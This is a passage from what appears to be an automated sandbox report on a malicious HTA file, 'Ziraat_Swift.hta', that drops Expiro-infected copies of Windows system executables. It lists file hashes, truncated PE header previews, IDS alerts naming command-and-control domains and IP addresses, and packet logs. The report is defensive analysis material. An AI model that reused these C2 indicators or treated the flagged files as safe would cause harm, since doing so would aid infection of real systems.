                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@...................................._..... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1224192
                                                                                                                                                Entropy (8bit):5.163549081133242
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:z2G7AbHjkxsqjnhMgeiCl7G0nehbGZpbD:z2G7AbHjcDmg27RnWGj
                                                                                                                                                MD5:2E43BEE7F1270130B73391F853D6CB9C
                                                                                                                                                SHA1:DE6E331E48577BE6D9ECBB2F3C5BD59C944E5CF8
                                                                                                                                                SHA-256:35164F41EFFA2AC98EE92D984442725D8277C2973A0A9164679F18D5B5587DD0
                                                                                                                                                SHA-512:3599D7588BCB4E9A203FB6F7D29D6374652DE052B69EAE2D35333D81C65F60A051F67CEEFCA4145F7CE5252924CE4A18343766BA9F84666F8DD528213F01E475
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\FXSSVC.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1242624
                                                                                                                                                Entropy (8bit):7.288941667956981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4kdpSI+K3S/GWei+qNv2uG3psqjnhMgeiCl7G0nehbGZpbD:46SIGGWei2uG3tDmg27RnWGj
                                                                                                                                                MD5:B7AC35C8D5EC032758BDF18DAF940E76
                                                                                                                                                SHA1:0DCC0A15777969306B5488E6B47E7B78B5671025
                                                                                                                                                SHA-256:74A8579D03832BD09BD7C95B263B7CFD958A099161312FFD89E981C63C00A31C
                                                                                                                                                SHA-512:19F15649266DDE3118B00B8549EC5CE9A5C22BC505E3028630F51AFC29D1F0FB3E0B2B76D622AAF85491DC391A2CFA8A98A05D74FD576CB547219325237CADE0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P........... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\Locator.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1141248
                                                                                                                                                Entropy (8bit):5.017509010481009
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:66Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:66sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:DCAC6C83695DE7AFC6FBC22B2463934D
                                                                                                                                                SHA1:23C193590CC3506BACF5A5652007D63D33C959C0
                                                                                                                                                SHA-256:92B6E80773DEE59276C778F4A2BB3E81AE72AFB267A3FDECA3051BE5C44C2884
                                                                                                                                                SHA-512:0DF8121CD578962226551F1D0B39AF391C32DFAB3E1B06A58EB22B2E680917C386AB2B185DFB51D664920682192C0765C923770BF552B594CE14586B3C3F5C78
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):0.3213963681452244
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:gTvaq28ta/k/uMclF6vMclFq5zwnGsz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GUV:2V280kqF69Fq5zxx6CzE5Z2+fqjFyA
                                                                                                                                                MD5:CAB3B9217EF400B9A7B2AE8C928F7FF4
                                                                                                                                                SHA1:A74AEE2841EA5EEC1E443A9620E02D52270446B4
                                                                                                                                                SHA-256:0DB4D05DC085CC46E916820E4EBDA80FD1C94F634163791B224E5672432E0DE3
                                                                                                                                                SHA-512:3DE9F05E3254247AC2EC0703B32E66CDE406B131BDFA1D7A194881D742911143F064DBB1820B5F63ACADBA23582B354341444CA2D2886B1B3B0001D329B5E0FE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.@..X...X.......................................X...!...........................p...@...r] ..............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............M...D..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.p...@...r] .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1235968
                                                                                                                                                Entropy (8bit):5.182185209520669
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:7pFtQO9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mO9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:4E2ACC748CE94AC4AC70C66C0815F52C
                                                                                                                                                SHA1:AB5A45937861839B2236491A856C92F06994203F
                                                                                                                                                SHA-256:E33CCA3D95D226FEA17A517C6E505D76B53C8F7E39E537372DD35249367BE5E3
                                                                                                                                                SHA-512:135BD1126F7179214DC0564586E1301FED7100EC662BBEBC3D59A487D5EA7B2CB11E4FABF2A88A342E22726BC280C4A0738765FB68B63154C37DDC024148F31E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@....................................H..... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\SensorDataService.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1846784
                                                                                                                                                Entropy (8bit):6.939434724876197
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:qW6BApg2YuyuNDYTabvcRvNYf8km1wsqjnhMgeiCl7G0nehbGZpbD:qF2YuHNETovcvNYf8kmSDmg27RnWGj
                                                                                                                                                MD5:723558C0A185F957C2EBE638F8BBB34E
                                                                                                                                                SHA1:47F9838098BBDA1B627B1824BEF01803F6069503
                                                                                                                                                SHA-256:72181905EC0A9CD480674B7B9517BB6144FB37C9D16649A22DF9108DDFDF3E2D
                                                                                                                                                SHA-512:8296379A6A75603F2E2099A6A99266A5269209AE26E9F7CC78BCCD140566AC5A8E22E935AE8E1B0F4D97E908EC66CEC4A690CF8DACADDB1C1FA391080E4A3725
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p............ .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\Spectrum.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1455616
                                                                                                                                                Entropy (8bit):7.238879043874979
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:/iW6ZvAKF5i/dN9Bdexj9Trk+F9sqjnhMgeiCl7G0nehbGZpbD:/YxF50b9Bdm9TxnDmg27RnWGj
                                                                                                                                                MD5:FA93A4B8D19BEF4A259ABCD64DCFEFC3
                                                                                                                                                SHA1:11CFA9B698AC3D59B0DAD798B9758692BA5C04DA
                                                                                                                                                SHA-256:B92889091650EFCF8B21B028FE97DAF54BB55998E131FC1F708F3C3445B35A5C
                                                                                                                                                SHA-512:0CDBA4B03799C05B7967A9C405656110EC38D3985815EBB476BD9DCBB6B421F45B0E406EB05B399D195290BC56F0BC05A7C8630539E9AC69B1220AD838CD37F0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@....................................F..... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\alg.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1225728
                                                                                                                                                Entropy (8bit):5.1633219985364525
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ZEP3R6AXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:q6AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:70BB2AC3B1D5DF22D2B74DA852AD13AA
                                                                                                                                                SHA1:959E817B16BF61A0B1CD33CDABD1D2EDE6D4229B
                                                                                                                                                SHA-256:EF66D247A07B5701A9D0794B9090913EB2D1F5B2BB7C589451922F9918C7B8F0
                                                                                                                                                SHA-512:3DFC6D77C2C5AC035A2D23B24CA0529F3B2152B5536855DFFB0002C90B1406F82749D5C957388D8B7E46928242639078F55930C18F7952C79DCC259378D5A5E8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.bin

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12320
                                                                                                                                                Entropy (8bit):7.984543359295405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZTE6SUS7yFNS3wUrSN9e6eQ4wIfjnt+t+Z3CDgCUPkbLmYdbKaOpUZ/4jKUo88rL:ZRS0N6wISneDQURR3bKbLmYdG9Jo883
                                                                                                                                                MD5:AA3595F18032D14BE0AD5AA06873DC7E
                                                                                                                                                SHA1:D41184C82ADA247417D617B8F49A341D2130041A
                                                                                                                                                SHA-256:461F48A056CBA271102DF0B06955C85F031F000329CA38F04F35FECDEC023E56
                                                                                                                                                SHA-512:7D4422F859901A56F584AF4A46A00EECA8C2A260C8077C97E11EE4988B52F2223BCE3B33B438663278DD118AE1C6AA2512109F0BB8EF545EA2B408CC42D49054
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..g.,0>u...6e...F4..%....:.....d..[X&.y.iP...[:.+i.eC.v.V"G..g...7.Y.M..)..y........0r....F7.....p..`.;*b.(.|....X>>..o..).=.U...................p..`o[....y..,-.c."I..\..B v.E=e.E..V.....J..M9..G.........Z.......6W.*.8*...\...S.|U.B.Y...f...v|IG7..5v.J'.~qao9...^W.J:...Y_.....n7....U.>M@..AUsd..o~......o .......?;.......d......].n&q.\..~L.l..M.p2....@....MB..S....0A./O...*.....1.{.o.FMy....3^+.^....mo...#..8....I....c..]s...iKO......D..D...BQ6.}R.. LT...:.Zc.J...~.y..}.4.l}.&....D.+?....H..g..].....5|f&X.cV..|H..U6...D..e:yq<./MhUBn..o].'8..I.#3..Z..#Y..^.x./8....J...Q...V....[K[&Q...A..\..,.(m....{#..o.y..~.'Pe`.l.tB.....L...P........rQ...e_XV.......bX3.me..dG.1u.s]]......(.. -.YG..1........-.S...{PD..Mu_F. v AK.LsD..,y..9sk..t.V.t..T....b%.=..~......5..q..m..Z..."..u...T..r.D]Z.44v...?E;R..x....*...0.S..CW[..5.mKZS_<:.{A..X.3..oe...p.9.s.BM.o..:0."..:c....]..W..`..E...L.~D.+H..n.c.-.....{...%1..t...F..7'Q...;21.#.i..Gv..]vq...`l.Y.;..

                                                                                                                                                C:\Windows\System32\msdtc.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1278464
                                                                                                                                                Entropy (8bit):5.142967604081751
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:kjkyzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kIyzsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:6B414CB462A630E3121C6075205CFF23
                                                                                                                                                SHA1:FFDE4B2A1B5B5684523D711BBBA47C51691F04C0
                                                                                                                                                SHA-256:227D63EE8BDF5CCCAC18A7E7720E35B91267E36F11F54756281EF8739877908D
                                                                                                                                                SHA-512:70DCDB21EED61D10B327A19AEFB36AC81C1056B9A31EE6C3288F7EF96D87E09F86300BA0E7BC34DB2B9183371FAE8692C484BCED2B7FA030F0EFFE8F68FBA94A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\msiexec.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1199616
                                                                                                                                                Entropy (8bit):5.083876467963892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:e4DBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:26B9B4F154D44F5E82A6738B098DC88E
                                                                                                                                                SHA1:40483AC8648D9E15EE6E2FA20F1995CB787F055D
                                                                                                                                                SHA-256:4CBB5A9425A4C8EB5EFF1097157EC67B5DE187D7CDE1B9DD927172685877446A
                                                                                                                                                SHA-512:53A8A4E3397F825F28BF3C9D0C9BC81A12DED7DDC8FB9AE4E81E1441C60750A19510B6CEAC0313486F58F1591F80DA008C7EC50EF78A158FC3293B6EF99BA4E2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@....................................1..... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                C:\Windows\System32\snmptrap.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1146880
                                                                                                                                                Entropy (8bit):5.0275553024364035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:f9tXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1tsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:B2CFA94DAEAB765B33AE6E7BD777C6D9
                                                                                                                                                SHA1:AED4A028860673A21D30DD7416496D32750A1099
                                                                                                                                                SHA-256:A40863112A305D02DE1D46ED6B35F98CA62621C08B922B7F7C29F5452740C063
                                                                                                                                                SHA-512:8434A966C0EF0A12EF1BB0E30C0C9FA062756BABC899C79C6D60671941F1791AC1262E4D0559F5D7E205DF6953F6E73C718BE5D3D8CD06B79EB7D46E221169F1
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................u;.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:HTML document, ASCII text, with very long lines (64805), with CRLF line terminators
                                                                                                                                                Entropy (8bit):5.806350213988054
                                                                                                                                                TrID:
                                                                                                                                                • HyperText Markup Language (15015/1) 28.87%
                                                                                                                                                • Visual Basic Script (13500/0) 25.95%
                                                                                                                                                • HyperText Markup Language (12001/1) 23.07%
                                                                                                                                                • HyperText Markup Language (11501/1) 22.11%
                                                                                                                                                File name:Ziraat_Swift.hta
                                                                                                                                                File size:2'325'905 bytes
                                                                                                                                                MD5:42080886d61700323e62d2de3a32454d
                                                                                                                                                SHA1:0d499a3a4b044cdd2685c2df7de1c4ebe740703f
                                                                                                                                                SHA256:5f0d6bb3445ed0c410b2dd8874cf7fc7b1c4e06cc2e620790eb782f2c339c796
                                                                                                                                                SHA512:1f6bc020e2818423e2540bbb0cc6a19f7bb6ac952d9f5cded5dce5a374c4d3c3aaabaf2ea1eabed2cbe4c24417b14a63285d7f33fd407de02cc46d8491280900
                                                                                                                                                SSDEEP:24576:CfE7hFTaWOiByiEkv5VKB0sQBKU4lqAzJQ0lOwAmp/wNR/GARRsFPEt592Sx09Hg:GKmUiq0XAmp/CsAUWUt9Yy8dNryaKC
                                                                                                                                                TLSH:81B5F121C6154D9C264BCD2D2D0A0D97511CFFFB958AFA06CA8A7C07A6DBF1E20B971C
                                                                                                                                                File Content Preview:<!DOCTYPE html>..<html>..<head>.. <title>Base64 to Executable</title>.. <HTA:APPLICATION .. ID="oHTA".. APPLICATIONNAME="Base64ToExecutable".. BORDER="none".. CAPTION="no".. SHOWINTASKBAR="no".. SINGLEINSTAN

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-02T07:56:10.027681+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449731TCP
                                                                                                                                                2024-12-02T07:56:10.027681+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449731TCP
                                                                                                                                                2024-12-02T07:56:13.018778+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.449734TCP
                                                                                                                                                2024-12-02T07:56:13.018778+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.449734TCP
                                                                                                                                                2024-12-02T07:56:15.319591+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.130.080TCP
                                                                                                                                                2024-12-02T07:56:17.558035+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4623341.1.1.153UDP
                                                                                                                                                2024-12-02T07:56:17.612052+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.449737TCP
                                                                                                                                                2024-12-02T07:56:17.612052+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.449737TCP
                                                                                                                                                2024-12-02T07:56:24.097750+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44974454.244.188.17780TCP
                                                                                                                                                2024-12-02T07:56:26.236257+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4526291.1.1.153UDP
                                                                                                                                                2024-12-02T07:56:27.710262+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449749193.122.130.080TCP
                                                                                                                                                2024-12-02T07:57:38.022398+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44979082.112.184.19780TCP
                                                                                                                                                2024-12-02T07:57:55.225518+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.449872TCP
                                                                                                                                                2024-12-02T07:57:55.225518+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.449872TCP
                                                                                                                                                2024-12-02T07:57:58.046080+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.449881TCP
                                                                                                                                                2024-12-02T07:57:58.046080+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.449881TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 2, 2024 07:56:07.148231983 CET4973080192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:07.268418074 CET804973054.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:07.268511057 CET4973080192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:07.579886913 CET4973080192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.327303886 CET4973180192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.447262049 CET804973154.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.447385073 CET4973180192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.478467941 CET4973180192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.478467941 CET4973180192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.548065901 CET4973280192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.598512888 CET804973154.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.598541021 CET804973154.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.669473886 CET804973254.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.669564009 CET4973280192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.670545101 CET4973280192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.670588970 CET4973280192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:08.790582895 CET804973254.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.790612936 CET804973254.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:09.793368101 CET4973280192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:09.868376970 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:09.906385899 CET804973154.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:09.906483889 CET804973154.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:09.906560898 CET4973180192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:09.907538891 CET4973180192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:09.988394976 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:09.988508940 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:09.989016056 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:10.027681112 CET804973154.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:10.109006882 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:10.559447050 CET4973480192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:10.679389954 CET804973418.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:10.679502010 CET4973480192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:10.680054903 CET4973480192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:10.680156946 CET4973480192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:10.799925089 CET804973418.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:10.799994946 CET804973418.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:12.898097038 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:12.898211002 CET804973418.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:12.898221016 CET804973418.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:12.898277044 CET4973480192.168.2.418.141.10.107
